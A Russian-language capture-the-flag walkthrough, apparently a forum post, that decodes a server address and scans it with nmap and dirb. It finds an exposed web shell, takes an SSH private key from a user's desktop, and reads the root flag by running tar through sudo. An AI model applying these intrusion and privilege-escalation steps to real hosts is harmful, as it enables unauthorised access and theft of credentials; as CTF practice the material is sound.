По просьбе создателя пишу прохождение. Давайте сделаем это быстро!
1. Нам дан адрес сервера закодированный в Base64. Переводим его в привычный вид командой в терминале
Код:
Код:
echo "MzcuMTQwLjE5Ny4yMDA=" | base64 -d
На выходе получаем ip
Код:
2. Запускаем nmap и смотрим результаты
На 80 порту крутится вебсервер, классика. Открываем в браузере.
3. Ничего необычного, запускаем dirb.
Код:
Код:
dirb http://37.140.197.200
Видим интересную директорию
Код:
Код:
http://37.140.197.200/term/
Переходим и обнаруживаем вебшелл
4. После недолгих хождений в директории /home/manager/Desktop был обнаружен приватный ключ rsa используемый для подключения по протоколу ssh
5. Подключаемся и получаем шелл юзера manager
6. Получаем 1-ый флаг
7. Выполним команду
Код:
Код:
uid=1000(manager) gid=1000(manager) groups=27(sudo)
Наш пользователь входит в группу sudo, запомним это!
8. Напишем в терминале
Ага, мы можем использовать архиватор tar от имени рута чтобы получить флаг (не зная при этом пароль последнего).
9. Выполняем:
Код:
Код:
sudo tar cf flag.tar /root/root.txt
tar xvf flag.tar
10. Получаем 2-ой флаг
Благодарю @
HtOnion за интересное задание, мне было очень интересно разобраться с ним.